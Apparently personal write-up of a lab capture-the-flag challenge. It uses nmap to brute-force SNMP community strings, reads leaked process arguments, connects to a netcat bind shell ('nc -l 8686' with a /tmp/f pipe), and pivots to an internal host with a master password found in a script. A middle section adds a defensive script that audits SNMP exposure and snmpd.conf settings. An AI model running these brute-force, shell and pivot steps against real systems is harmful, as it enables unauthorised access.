some notes

Nmap Challenge

We have a wordlist of SNMP community strings on our desktop. Target IP: 192.168.6.2

I found this command on the nmap official website:
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
It requires sudo, because a UDP scan (-sU) needs raw sockets.

I used this command (UDP port 161 only, with the wordlist from the desktop):
sudo nmap -sU -p 161 --script=snmp-brute.nse --script-args snmp-brute.communitiesdb=./Desktop/common-snmp-community-strings.txt 192.168.6.2
and got this output:

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  read-write - Valid credentials
MAC Address: 52:54:00:34:59:A4 (QEMU virtual NIC)

I used this command to list the running processes over SNMP, authenticating with the community string that was just found valid (the script walks the HOST-RESOURCES-MIB process table, parameters included):
sudo nmap -sU -p 161 --script=snmp-processes.nse --script-args creds.snmp=read-write 192.168.6.2

Two entries had interesting parameters:
Params: -c cat /tmp/f | /root/remote-access-terminal.sh --password 97c9c14b90df1d8c | nc -l 8686 > /tmp/f
Params: /root/remote-access-terminal.sh --password 97c9c14b90df1d8c

The process list shows nc listening on port 8686 on the target, so we can connect to that bind shell with netcat. My command for that:
nc 192.168.6.2 8686
The remote-access terminal then asks for a password; we supply the one that was visible in the process parameters. Once that is done we have a shell and can read the first flag.
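The two findings above (a guessable read-write community string, and a password passed on a command line where SNMP's process table hands it to anyone holding that community) are exactly what a defender would want to catch before a scan like this does. The script below is an added example, not nmap's code and not part of the challenge: it parses snmp-brute and snmp-processes output of the shape shown above, flags credential-looking process arguments, and audits an snmpd.conf for the weak settings that make this possible, with a hardened counterpart beside it. The nmap output samples are constructed from the lines above (process names and PIDs are made up), the snmpd.conf directives are net-snmp's, and the angle-bracket values in the hardened config are placeholders.

```python
"""Audit SNMP exposure from nmap NSE output and an snmpd.conf (added example)."""
import re

# Constructed sample, modelled on the snmp-brute result from the notes.
SNMP_BRUTE_OUTPUT = """\
PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute:
|   public - Valid credentials
|_  read-write - Valid credentials
MAC Address: 52:54:00:34:59:A4 (QEMU virtual NIC)
"""

# Constructed sample of snmp-processes output; PIDs and names are made up,
# the Params lines are the ones seen in the notes.
SNMP_PROCESSES_OUTPUT = """\
| snmp-processes:
|   1:
|     Name: init
|     Path: /sbin/init
|   412:
|     Name: sh
|     Path: /bin/sh
|     Params: -c cat /tmp/f | /root/remote-access-terminal.sh --password 97c9c14b90df1d8c | nc -l 8686 > /tmp/f
|   413:
|     Name: remote-access-terminal.sh
|     Path: /bin/bash
|_    Params: /root/remote-access-terminal.sh --password 97c9c14b90df1d8c
"""

# Constructed net-snmp configs: the weak shape that produces the result above,
# and a hardened one (read-only, source- and view-restricted v2c plus an SNMPv3 user).
SNMPD_CONF_WEAK = """\
# weak: guessable names, any source, full MIB, and write access
rocommunity public
rwcommunity read-write
"""
SNMPD_CONF_FIXED = """\
# hardened: <...> values are placeholders to be replaced
view systemonly included .1.3.6.1.2.1.1
rocommunity <long-random-string> 172.16.40.10 -V systemonly
createUser monitor SHA "<auth-passphrase>" AES "<priv-passphrase>"
rouser monitor priv -V systemonly
"""

VALID_CRED_RE = re.compile(r"^\|_?\s+(.+?) - Valid credentials\s*$")
PID_RE = re.compile(r"^\|_?\s+(\d+):\s*$")
PARAMS_RE = re.compile(r"^\|_?\s+Params:\s*(.*)$")
# "--password X", "-secret=X" style flags, or KEY=value such as PASSWORD=X.
SECRET_ARG_RE = re.compile(
    r"(?i)(?:-{1,2}(?:password|passwd|pwd|secret|token|api[-_]?key)(?:=|\s+)"
    r"|\b(?:password|passwd|secret|token)=)(\S+)")
WEAK_COMMUNITIES = {"public", "private", "read-write", "read-only", "admin", "manager"}


def valid_communities(nmap_text):
    """Community strings that snmp-brute reported as valid, in output order."""
    return [m.group(1) for line in nmap_text.splitlines()
            if (m := VALID_CRED_RE.match(line))]


def secrets_in_process_args(nmap_text):
    """(pid, secret) pairs for snmp-processes entries whose Params carry a credential."""
    pid, found = None, []
    for line in nmap_text.splitlines():
        if m := PID_RE.match(line):
            pid = int(m.group(1))
        elif m := PARAMS_RE.match(line):
            found.extend((pid, s) for s in SECRET_ARG_RE.findall(m.group(1)))
    return found


def audit_snmpd_conf(conf_text):
    """(severity, line_no, detail) findings for community directives in an snmpd.conf."""
    findings = []
    for n, raw in enumerate(conf_text.splitlines(), 1):
        tok = raw.split("#", 1)[0].split()
        if not tok:
            continue
        directive, community = tok[0].lower(), (tok[1] if len(tok) > 1 else "?")
        if directive in ("rwcommunity", "rwcommunity6"):
            findings.append(("high", n, f"writable community {community!r}: replace with an SNMPv3 rwuser or drop write access"))
        elif directive in ("rocommunity", "rocommunity6"):
            if community.lower() in WEAK_COMMUNITIES:
                findings.append(("medium", n, f"guessable community {community!r}"))
            if len(tok) < 3 or tok[2].lower() == "default":
                findings.append(("medium", n, f"community {community!r} accepted from any source address"))
            if "-V" not in tok:
                findings.append(("low", n, f"community {community!r} exposes the full MIB (no -V view), including process arguments"))
    return findings


if __name__ == "__main__":
    print("valid communities:", valid_communities(SNMP_BRUTE_OUTPUT))
    print("secrets in process args:", secrets_in_process_args(SNMP_PROCESSES_OUTPUT))
    for label, conf in (("weak", SNMPD_CONF_WEAK), ("fixed", SNMPD_CONF_FIXED)):
        print(f"{label} snmpd.conf:", audit_snmpd_conf(conf) or "no findings")
```

The process-argument check is the part that matters most here: restricting the community to a view such as `systemonly` closes the process-table leak, but the real fix is not to pass secrets as command-line arguments at all, since `ps` on the host shows them to every local user as well.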

Now it is interesting to look at the remote-access-terminal.sh script. It contains this line:

MASTER_PASSWORD=4b068d23e1f0e2a4 # Master password applicable across all servers, DO NOT DISTRIBUTE!

Interesting string.

I opened a reverse shell and then upgraded it.

Internal server's IP: 172.16.40.66. It looks like the same port is open on the internal server.

A little later I found out that 172.16.40.66 was not the internal server. Scanning the subnet with
nmap 172.16.40.0/24
showed that the internal server is actually 172.16.40.67. We have reason to believe we can connect to it the same way we connected to the first machine, and we also know that the master password from the script should open that door as well. So now:
nc 172.16.40.67 8686
then enter the master password, and here we go.